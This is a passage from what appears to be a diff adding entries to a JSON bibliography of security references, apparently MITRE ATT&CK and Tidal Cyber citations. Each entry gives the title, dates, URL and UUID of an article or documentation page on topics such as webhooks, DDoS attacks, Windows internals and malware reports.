"description": "NIST Information Technology Laboratory. (n.d.). web bug. Retrieved March 22, 2023.", + "meta": { + "date_accessed": "2023-03-22T00:00:00Z", + "refs": [ + "https://csrc.nist.gov/glossary/term/web_bug" + ], + "source": "MITRE", + "title": "web bug" + }, + "related": [], + "uuid": "b4362602-faf0-5b28-a147-b3153da1903f", + "value": "NIST Web Bug" + }, + { + "description": "Stevens, D. (2017, November 13). WebDAV Traffic To Malicious Sites. Retrieved December 21, 2017.", + "meta": { + "date_accessed": "2017-12-21T00:00:00Z", + "date_published": "2017-11-13T00:00:00Z", + "refs": [ + "https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/" + ], + "source": "MITRE", + "title": "WebDAV Traffic To Malicious Sites" + }, + "related": [], + "uuid": "b521efe2-5c1c-48c5-a2a9-95da2367f537", + "value": "Didier Stevens WebDAV Traffic" + }, + { + "description": "Jossef Harush Kadouri. (2022, March 7). Webhook Party — Malicious packages caught exfiltrating data via legit webhook services. Retrieved July 20, 2023.", + "meta": { + "date_accessed": "2023-07-20T00:00:00Z", + "date_published": "2022-03-07T00:00:00Z", + "refs": [ + "https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191" + ], + "source": "MITRE", + "title": "Webhook Party — Malicious packages caught exfiltrating data via legit webhook services" + }, + "related": [], + "uuid": "f68f1151-839e-5ae7-bab1-aa2b4c0d11ec", + "value": "Checkmarx Webhooks" + }, + { + "description": "Push Security. (2023, July 31). Webhooks. Retrieved August 4, 2023.", + "meta": { + "date_accessed": "2023-08-04T00:00:00Z", + "date_published": "2023-07-31T00:00:00Z", + "refs": [ + "https://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md" + ], + "source": "MITRE", + "title": "Webhooks" + }, + "related": [], + "uuid": "519693e2-71c9-55d2-98fd-be451837582a", + "value": "Push Security SaaS Attacks Repository Webhooks" + }, + { + "description": "Acunetix. (n.d.). Web Server Security and Database Server Security. Retrieved July 26, 2018.", + "meta": { + "date_accessed": "2018-07-26T00:00:00Z", + "refs": [ + "https://www.acunetix.com/websitesecurity/webserver-security/" + ], + "source": "MITRE", + "title": "Web Server Security and Database Server Security" + }, + "related": [], + "uuid": "cedbdeb8-6669-4c5c-a8aa-d37576aaa1ba", + "value": "acunetix Server Secuirty" + }, + { + "description": "Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.", + "meta": { + "date_accessed": "2017-11-30T00:00:00Z", + "date_published": "2017-06-23T00:00:00Z", + "refs": [ + "https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems" + ], + "source": "MITRE", + "title": "Well-known security identifiers in Windows operating systems" + }, + "related": [], + "uuid": "14b344ed-bde6-4755-b59a-595edb23a210", + "value": "Microsoft Well Known SIDs Jun 2017" + }, + { + "description": "PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.", + "meta": { + "date_accessed": "2020-09-29T00:00:00Z", + "date_published": "2020-08-17T00:00:00Z", + "refs": [ + "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html" + ], + "source": "MITRE", + "title": "WellMess malware: analysis of its Command and Control (C2) server" + }, + "related": [], + "uuid": "3afca6f1-680a-46ae-8cea-10b6b870d5e7", + "value": "PWC WellMess C2 August 2020" + }, + { + "description": "Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.", + "meta": { + "date_accessed": "2019-04-17T00:00:00Z", + "date_published": "2018-09-10T00:00:00Z", + "refs": [ + "https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/" + ], + "source": "MITRE", + "title": "We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan" + }, + "related": [], + "uuid": "d316c581-646d-48e7-956e-34e2f957c67d", + "value": "Cofense Astaroth Sept 2018" + }, + { + "description": "Microsoft. (n.d.). wevtutil. Retrieved September 14, 2021.", + "meta": { + "date_accessed": "2021-09-14T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil" + ], + "source": "MITRE", + "title": "wevtutil" + }, + "related": [], + "uuid": "25511dde-9e13-4e03-8ae4-2495e9f5eb5e", + "value": "Wevtutil Microsoft Documentation" + }, + { + "description": "Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.", + "meta": { + "date_accessed": "2018-07-02T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil" + ], + "source": "MITRE", + "title": "wevtutil" + }, + "related": [], + "uuid": "8896d802-96c6-4546-8a82-c1f7f2d71ea1", + "value": "Microsoft wevtutil Oct 2017" + }, + { + "description": "LOLBAS. (2021, September 26). Wfc.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-09-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/" + ], + "source": "Tidal Cyber", + "title": "Wfc.exe" + }, + "related": [], + "uuid": "a937012a-01c8-457c-8808-47c1753e8781", + "value": "Wfc.exe - LOLBAS Project" + }, + { + "description": "Bart Lenaerts-Bergman. (2023, March 14). WHAT ARE DOWNGRADE ATTACKS?. Retrieved May 24, 2023.", + "meta": { + "date_accessed": "2023-05-24T00:00:00Z", + "date_published": "2023-03-14T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/cybersecurity-101/attack-types/downgrade-attacks/" + ], + "source": "MITRE", + "title": "WHAT ARE DOWNGRADE ATTACKS?" + }, + "related": [], + "uuid": "47856c5f-6c4c-5b4c-bbc1-ccb6848d9b74", + "value": "Crowdstrike Downgrade" + }, + { + "description": "Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017.", + "meta": { + "date_accessed": "2017-11-16T00:00:00Z", + "refs": [ + "https://developer.chrome.com/extensions" + ], + "source": "MITRE", + "title": "What are Extensions?" + }, + "related": [], + "uuid": "fe00cee9-54d9-4775-86da-b7db73295bf7", + "value": "Chrome Extensions Definition" + }, + { + "description": "Stack Exchange - Security. (2012, July 31). What are the methods to find hooked functions and APIs?. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "date_published": "2012-07-31T00:00:00Z", + "refs": [ + "https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis" + ], + "source": "MITRE", + "title": "What are the methods to find hooked functions and APIs?" + }, + "related": [], + "uuid": "dfa76ff1-df9e-4cdf-aabe-476479cdcf13", + "value": "StackExchange Hooks Jul 2012" + }, + { + "description": "Jaron Bradley. (2021, November 14). What does APT Activity Look Like on macOS?. Retrieved January 19, 2022.", + "meta": { + "date_accessed": "2022-01-19T00:00:00Z", + "date_published": "2021-11-14T00:00:00Z", + "refs": [ + "https://themittenmac.com/what-does-apt-activity-look-like-on-macos/" + ], + "source": "MITRE", + "title": "What does APT Activity Look Like on macOS?" + }, + "related": [], + "uuid": "7ccda957-b38d-4c3f-a8f5-6cecdcb3f584", + "value": "macOS APT Activity Bradley" + }, + { + "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.", + "meta": { + "date_accessed": "2019-09-12T00:00:00Z", + "refs": [ + "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen" + ], + "source": "MITRE", + "title": "What Happens If Your JWT Is Stolen?" + }, + "related": [], + "uuid": "61e2fb16-d04b-494c-8bea-fb34e81faa73", + "value": "okta" + }, + { + "description": "Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.", + "meta": { + "date_accessed": "2020-10-04T00:00:00Z", + "refs": [ + "https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html" + ], + "source": "MITRE", + "title": "What is a botnet?" + }, + "related": [], + "uuid": "f97427f1-ea16-4e92-a4a2-4d62a800df15", + "value": "Norton Botnet" + }, + { + "description": "Microsoft. (2023, April 28). What is a DLL. Retrieved September 7, 2023.", + "meta": { + "date_accessed": "2023-09-07T00:00:00Z", + "date_published": "2023-04-28T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/troubleshoot/windows-client/deployment/dynamic-link-library" + ], + "source": "MITRE", + "title": "What is a DLL" + }, + "related": [], + "uuid": "f0ae2788-537c-5644-ba1b-d06a612e73c1", + "value": "Microsoft DLL" + }, + { + "description": "Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "refs": [ + "https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/" + ], + "source": "MITRE", + "title": "What is a DNS amplification attack?" + }, + "related": [], + "uuid": "734cb2bb-462a-4bdc-9774-6883f99379b9", + "value": "Cloudflare DNSamplficationDoS" + }, + { + "description": "Amazon. (n.d.). What Is Amazon VPC?. Retrieved October 6, 2019.", + "meta": { + "date_accessed": "2019-10-06T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html" + ], + "source": "MITRE", + "title": "What Is Amazon VPC?" + }, + "related": [], + "uuid": "7972332d-fbe9-4f14-9511-4298f65f2a86", + "value": "Amazon AWS VPC Guide" + }, + { + "description": "Cloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "refs": [ + "https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/" + ], + "source": "MITRE", + "title": "What is an HTTP flood DDoS attack?" + }, + "related": [], + "uuid": "1a5934a4-35ce-4f7c-be9c-c1faf4ee0838", + "value": "Cloudflare HTTPflood" + }, + { + "description": "Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "refs": [ + "https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/" + ], + "source": "MITRE", + "title": "What is a NTP amplificaiton attack?" + }, + "related": [], + "uuid": "09ce093a-d378-4915-a35f-bf18a278d873", + "value": "Cloudflare NTPamplifciationDoS" + }, + { + "description": "Microsoft. (2022, September 9). What is a Primary Refresh Token?. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2022-09-09T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token" + ], + "source": "MITRE", + "title": "What is a Primary Refresh Token?" + }, + "related": [], + "uuid": "d23bf6dc-979b-5f34-86a7-637979a5f20e", + "value": "Microsoft Primary Refresh Token" + }, + { + "description": "Justin Schamotta. (2022, October 28). What is a replay attack?. Retrieved September 27, 2023.", + "meta": { + "date_accessed": "2023-09-27T00:00:00Z", + "date_published": "2022-10-28T00:00:00Z", + "refs": [ + "https://www.comparitech.com/blog/information-security/what-is-a-replay-attack/" + ], + "source": "MITRE", + "title": "What is a replay attack?" + }, + "related": [], + "uuid": "a9f0b569-8f18-579f-bf98-f4f9b93e5524", + "value": "Comparitech Replay Attack" + }, + { + "description": "Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "refs": [ + "https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html" + ], + "source": "MITRE", + "title": "What is a SYN-ACK Flood Attack?" + }, + "related": [], + "uuid": "ec41de8a-c673-41bf-b713-4a647b135532", + "value": "Corero SYN-ACKflood" + }, + { + "description": "Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "refs": [ + "https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/" + ], + "source": "MITRE", + "title": "What is a SYN flood attack?" + }, + "related": [], + "uuid": "e292c4fe-ae77-4393-b666-fb6290cb4aa8", + "value": "Cloudflare SynFlood" + }, + { + "description": "Microsoft. (n.d.). What is a virtual machine (VM)?. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/" + ], + "source": "MITRE", + "title": "What is a virtual machine (VM)?" + }, + "related": [], + "uuid": "9afbd6a5-1c31-4727-8f36-04d4d8e65660", + "value": "Amazon VM" + }, + { + "description": "RedHat. (2022, June 1). What is a webhook?. Retrieved July 20, 2023.", + "meta": { + "date_accessed": "2023-07-20T00:00:00Z", + "date_published": "2022-06-01T00:00:00Z", + "refs": [ + "https://www.redhat.com/en/topics/automation/what-is-a-webhook" + ], + "source": "MITRE", + "title": "What is a webhook?" + }, + "related": [], + "uuid": "37321591-40fd-537e-ba74-71042bc5064e", + "value": "RedHat Webhooks" + }, + { + "description": "AWS. (2023, June 2). What is AWS System Manager?. Retrieved June 2, 2023.", + "meta": { + "date_accessed": "2023-06-02T00:00:00Z", + "date_published": "2023-06-02T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html" + ], + "source": "MITRE", + "title": "What is AWS System Manager?" + }, + "related": [], + "uuid": "a7813928-4351-54c5-a64e-61bd4689e93b", + "value": "AWS System Manager" + }, + { + "description": "Annamalai, N., Casey, C., Almeida, M., et. al.. (2019, June 18). What is Azure Virtual Network?. Retrieved October 6, 2019.", + "meta": { + "date_accessed": "2019-10-06T00:00:00Z", + "date_published": "2019-06-18T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview" + ], + "source": "MITRE", + "title": "What is Azure Virtual Network?" + }, + "related": [], + "uuid": "bf7f2e7a-f5ae-4b6e-8c90-fd41a92c4615", + "value": "Microsoft Azure Virtual Network Overview" + }, + { + "description": "Bart Lenaerts-Bergmans. (2023, March 10). What is Business Email Compromise?. Retrieved August 8, 2023.", + "meta": { + "date_accessed": "2023-08-08T00:00:00Z", + "date_published": "2023-03-10T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/cybersecurity-101/business-email-compromise-bec/" + ], + "source": "MITRE", + "title": "What is Business Email Compromise?" + }, + "related": [], + "uuid": "7e674a8d-e79f-5cb0-8ad2-a7678e647c6f", + "value": "CrowdStrike-BEC" + }, + { + "description": "Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020.", + "meta": { + "date_accessed": "2020-03-15T00:00:00Z", + "refs": [ + "https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling" + ], + "source": "MITRE", + "title": "What Is DNS Tunneling?" + }, + "related": [], + "uuid": "efe1c443-475b-45fc-8d33-5bf3bdf941c5", + "value": "PAN DNS Tunneling" + }, + { + "description": "Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.", + "meta": { + "date_accessed": "2023-02-24T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-reference/email-spoofing" + ], + "source": "MITRE", + "title": "What Is Email Spoofing?" + }, + "related": [], + "uuid": "fe9f7542-bbf0-5e34-b3a9-8596cc5aa754", + "value": "Proofpoint-spoof" + }, + { + "description": "Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019.", + "meta": { + "date_accessed": "2019-09-10T00:00:00Z", + "date_published": "2016-04-07T00:00:00Z", + "refs": [ + "http://www.magnusviri.com/Mac/what-is-emond.html" + ], + "source": "MITRE", + "title": "What is emond?" + }, + "related": [], + "uuid": "373f64a5-a30f-4b6e-b352-d0c6f8b65fdb", + "value": "magnusviri emond Apr 2016" + }, + { + "description": "Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020.", + "meta": { + "date_accessed": "2020-12-30T00:00:00Z", + "date_published": "2018-11-28T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed" + ], + "source": "MITRE", + "title": "What is federation with Azure AD?" + }, + "related": [], + "uuid": "fedb345f-b5a7-40cd-98c7-6b14bab95ed9", + "value": "Microsoft - Azure AD Federation" + }, + { + "description": "grsecurity. (2017, December 12). What is grsecurity?. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-12-12T00:00:00Z", + "refs": [ + "https://grsecurity.net/" + ], + "source": "MITRE", + "title": "What is grsecurity?" + }, + "related": [], + "uuid": "f87c0c95-65bd-4b57-9b7d-1b7936f03c2a", + "value": "grsecurity official" + }, + { + "description": "Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020.", + "meta": { + "date_accessed": "2020-06-16T00:00:00Z", + "date_published": "2005-08-14T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/" + ], + "source": "MITRE", + "title": "What is linux-gate.so.1?" + }, + "related": [], + "uuid": "ae70f799-ebb6-4ffe-898e-945cb754c1cb", + "value": "VDSO Aug 2005" + }, + { + "description": "Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021.", + "meta": { + "date_accessed": "2021-10-05T00:00:00Z", + "date_published": "2020-09-27T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console" + ], + "source": "MITRE", + "title": "What is Microsoft Management Console?" + }, + "related": [], + "uuid": "57e130ab-f981-423e-bafe-51d0d0e1abdf", + "value": "what_is_mmc" + }, + { + "description": "Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.", + "meta": { + "date_accessed": "2020-03-15T00:00:00Z", + "refs": [ + "https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework" + ], + "source": "MITRE", + "title": "What is .NET Framework?" + }, + "related": [], + "uuid": "b4727044-51bb-43b3-afdb-515bb4bb0f7e", + "value": "Microsoft NET" + }, + { + "description": "Ciarniello, A. (2019, September 24). What is Pastebin and Why Do Hackers Love It?. Retrieved April 11, 2023.", + "meta": { + "date_accessed": "2023-04-11T00:00:00Z", + "date_published": "2019-09-24T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it" + ], + "source": "MITRE", + "title": "What is Pastebin and Why Do Hackers Love It?" + }, + "related": [], + "uuid": "3fc422e5-9a1d-5ac4-8e65-1df13d8a688e", + "value": "Pastebin EchoSec" + }, + { + "description": "Microsoft. (n.d.). What is Protected View?. Retrieved November 22, 2017.", + "meta": { + "date_accessed": "2017-11-22T00:00:00Z", + "refs": [ + "https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653" + ], + "source": "MITRE", + "title": "What is Protected View?" + }, + "related": [], + "uuid": "5261895f-367f-4c5d-b4df-7ff44bbbe28e", + "value": "Microsoft Protected View" + }, + { + "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.", + "meta": { + "date_accessed": "2016-06-12T00:00:00Z", + "date_published": "2003-03-28T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc787851.aspx" + ], + "source": "MITRE", + "title": "What Is RPC?" + }, + "related": [], + "uuid": "7eaa0fa8-953a-482e-8f6b-02607e928525", + "value": "TechNet RPC" + }, + { + "description": "Apple. (2014, April 9). What Is the I/O Kit?. Retrieved September 24, 2021.", + "meta": { + "date_accessed": "2021-09-24T00:00:00Z", + "date_published": "2014-04-09T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html" + ], + "source": "MITRE", + "title": "What Is the I/O Kit?" + }, + "related": [], + "uuid": "ac90279f-becd-4a96-a08e-8c4c26dba3c0", + "value": "IOKit Fundamentals" + }, + { + "description": "baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021.", + "meta": { + "date_accessed": "2021-03-24T00:00:00Z", + "date_published": "2020-08-09T00:00:00Z", + "refs": [ + "https://www.baeldung.com/linux/ld_preload-trick-what-is" + ], + "source": "MITRE", + "title": "What Is the LD_PRELOAD Trick?" + }, + "related": [], + "uuid": "6fd6ea96-1cf4-4169-8069-4f29dbc9f217", + "value": "Baeldung LD_PRELOAD" + }, + { + "description": "Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020.", + "meta": { + "date_accessed": "2020-03-28T00:00:00Z", + "date_published": "2011-04-19T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)" + ], + "source": "MITRE", + "title": "What Is VBScript?" + }, + "related": [], + "uuid": "5ea8d8c7-8039-4210-967a-a4dcd566bf95", + "value": "Microsoft VBScript" + }, + { + "description": "CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.", + "meta": { + "date_accessed": "2023-09-12T00:00:00Z", + "refs": [ + "https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers." + ], + "source": "MITRE", + "title": "What is vendor email compromise (VEC)?" + }, + "related": [], + "uuid": "4fd7c9f7-4731-524a-b332-9cb7f2c025ae", + "value": "VEC" + }, + { + "description": "Proofpoint. (n.d.). What Is Vishing?. Retrieved September 8, 2023.", + "meta": { + "date_accessed": "2023-09-08T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-reference/vishing" + ], + "source": "MITRE", + "title": "What Is Vishing?" + }, + "related": [], + "uuid": "7a200d34-b4f3-5036-8582-23872ef27eb1", + "value": "Proofpoint Vishing" + }, + { + "description": "Alashwali, E. S., Rasmussen, K. (2019, January 26). What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.", + "meta": { + "date_accessed": "2021-12-07T00:00:00Z", + "date_published": "2019-01-26T00:00:00Z", + "refs": [ + "https://arxiv.org/abs/1809.05681" + ], + "source": "MITRE", + "title": "What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS" + }, + "related": [], + "uuid": "4459076e-7c79-4855-9091-5aabd274f586", + "value": "taxonomy_downgrade_att_tls" + }, + { + "description": "Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020.", + "meta": { + "date_accessed": "2020-11-17T00:00:00Z", + "date_published": "2011-06-03T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html" + ], + "source": "MITRE", + "title": "What the fxsst?" + }, + "related": [], + "uuid": "06f8f5b2-2ebe-4210-84b6-f86e911a7118", + "value": "FireEye fxsst June 2011" + }, + { + "description": "Krebs, B.. (2019, August 19). What We Can Learn from the Capital One Hack. Retrieved March 25, 2020.", + "meta": { + "date_accessed": "2020-03-25T00:00:00Z", + "date_published": "2019-08-19T00:00:00Z", + "refs": [ + "https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/" + ], + "source": "MITRE", + "title": "What We Can Learn from the Capital One Hack" + }, + "related": [], + "uuid": "7d917231-735c-40d8-806d-7fee60d2f996", + "value": "Krebs Capital One August 2019" + }, + { + "description": "Pravs. (2009, May 25). What you need to know about alternate data streams in windows? Is your Data secure? Can you restore that?. Retrieved March 21, 2018.", + "meta": { + "date_accessed": "2018-03-21T00:00:00Z", + "date_published": "2009-05-25T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore" + ], + "source": "MITRE", + "title": "What you need to know about alternate data streams in windows? Is your Data secure? Can you restore that?" + }, + "related": [], + "uuid": "e2970bef-439d-435d-92e7-8c58abbd270c", + "value": "Symantec ADS May 2009" + }, + { + "description": "Galperin, E., Et al.. (2016, August 4). When Governments Attack: State Sponsored Malware Attacks Against Activists, Lawyers, and Journalists. Retrieved May 23, 2018.", + "meta": { + "date_accessed": "2018-05-23T00:00:00Z", + "date_published": "2016-08-04T00:00:00Z", + "refs": [ + "https://www.blackhat.com/docs/us-16/materials/us-16-Quintin-When-Governments-Attack-State-Sponsored-Malware-Attacks-Against-Activists-Lawyers-And-Journalists.pdf" + ], + "source": "MITRE", + "title": "When Governments Attack: State Sponsored Malware Attacks Against Activists, Lawyers, and Journalists" + }, + "related": [], + "uuid": "1debebac-6578-433f-b8c3-d17e704ee501", + "value": "BH Manul Aug 2016" + }, + { + "description": "Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.", + "meta": { + "date_accessed": "2022-08-18T00:00:00Z", + "date_published": "2021-05-18T00:00:00Z", + "refs": [ + "https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/" + ], + "source": "MITRE", + "title": "When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar" + }, + "related": [], + "uuid": "8768909c-f511-4067-9a97-6f7dee24f276", + "value": "Dragos Heroku Watering Hole" + }, + { + "description": "Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.", + "meta": { + "date_accessed": "2021-10-06T00:00:00Z", + "date_published": "2019-11-14T00:00:00Z", + "refs": [ + "https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f" + ], + "source": "MITRE", + "title": "When Kirbi walks the Bifrost" + }, + "related": [], + "uuid": "58ecb4e9-25fc-487b-9fed-25c781cc531b", + "value": "SpectorOps Bifrost Kerberos macOS 2019" + }, + { + "description": "Harbison, M. and Renals, P. (2022, July 5). When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors. Retrieved February 1, 2023.", + "meta": { + "date_accessed": "2023-02-01T00:00:00Z", + "date_published": "2022-07-05T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/" + ], + "source": "MITRE", + "title": "When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors" + }, + "related": [], + "uuid": "a9ab0444-386b-5baf-84e1-0e6df4a21296", + "value": "Palo Alto Brute Ratel July 2022" + }, + { + "description": "Chris Taylor. (2017, October 5). When Phishing Starts from the Inside. Retrieved October 8, 2019.", + "meta": { + "date_accessed": "2019-10-08T00:00:00Z", + "date_published": "2017-10-05T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/phishing-starts-inside/" + ], + "source": "MITRE", + "title": "When Phishing Starts from the Inside" + }, + "related": [], + "uuid": "dbdc2009-a468-439b-bd96-e6153b3fb8a1", + "value": "Trend Micro When Phishing Starts from the Inside 2017" + }, + { + "description": "Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019", + "meta": { + "date_accessed": "2019-10-22T00:00:00Z", + "refs": [ + "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + ], + "source": "MITRE", + "title": "When The Lights Went Out" + }, + "related": [], + "uuid": "7f0acd33-602e-5f07-a1ae-a87e3c8f2eb5", + "value": "Booz Allen Hamilton" + }, + { + "description": "Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx" + ], + "source": "MITRE", + "title": "When to Use Transactional NTFS" + }, + "related": [], + "uuid": "f315072c-67cb-4166-aa18-8e92e00ef7e8", + "value": "Microsoft Where to use TxF" + }, + { + "description": "Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "date_published": "2018-11-01T00:00:00Z", + "refs": [ + "https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf" + ], + "source": "MITRE", + "title": "Where 2 worlds collide Bringing Mimikatz et al to UNIX" + }, + "related": [], + "uuid": "5ad06565-6694-4c42-81c9-880d66f6d07f", + "value": "Brining MimiKatz to Unix" + }, + { + "description": "Carvey, H.. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.", + "meta": { + "date_accessed": "2016-01-25T00:00:00Z", + "date_published": "2014-09-02T00:00:00Z", + "refs": [ + "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems" + }, + "related": [], + "uuid": "fcc9b52a-751f-4985-8c32-7aaf411706ad", + "value": "Dell Lateral Movement" + }, + { + "description": "Carvey, H.. (2014, September). Where You AT?: Indicators of Lateral Movement Using at.exe on Windows 7 Systems. Retrieved November 27, 2019.", + "meta": { + "date_accessed": "2019-11-27T00:00:00Z", + "date_published": "2014-09-01T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems" + ], + "source": "MITRE", + "title": "Where You AT?: Indicators of Lateral Movement Using at.exe on Windows 7 Systems" + }, + "related": [], + "uuid": "cd197a24-3671-427f-8ee6-da001ec985c8", + "value": "Secureworks - AT.exe Scheduled Task" + }, + { + "description": "Cybereason Nocturnus. (2022, February 15). Cybereason vs. WhisperGate and HermeticWiper. Retrieved March 10, 2022.", + "meta": { + "date_accessed": "2022-03-10T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/cybereason-vs.-whispergate-wiper" + ], + "source": "MITRE", + "title": "WhisperGate and HermeticWiper" + }, + "related": [], + "uuid": "464d9cac-04c7-4e57-a5d6-604fba90a982", + "value": 